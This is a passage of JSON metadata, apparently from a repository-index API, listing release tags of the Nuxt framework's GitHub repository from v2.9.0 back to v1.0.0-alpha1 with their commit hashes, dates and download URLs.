9b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.eco